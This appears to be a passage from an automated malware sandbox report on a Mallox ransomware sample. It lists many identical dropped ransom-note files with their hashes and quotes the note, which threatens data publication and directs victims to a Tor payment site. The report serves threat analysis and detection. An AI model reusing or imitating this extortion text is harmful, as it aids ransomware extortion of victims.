                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe\Acrobat\DC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe\Acrobat\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\Adobe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\acrocef_low\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\SearchEmbdIndex\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_5132_79551310\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_1007533999\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_1016618583\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_1077744702\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_1080361660\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_1178805644\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Temp\edge_BITS_6096_1197124144\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
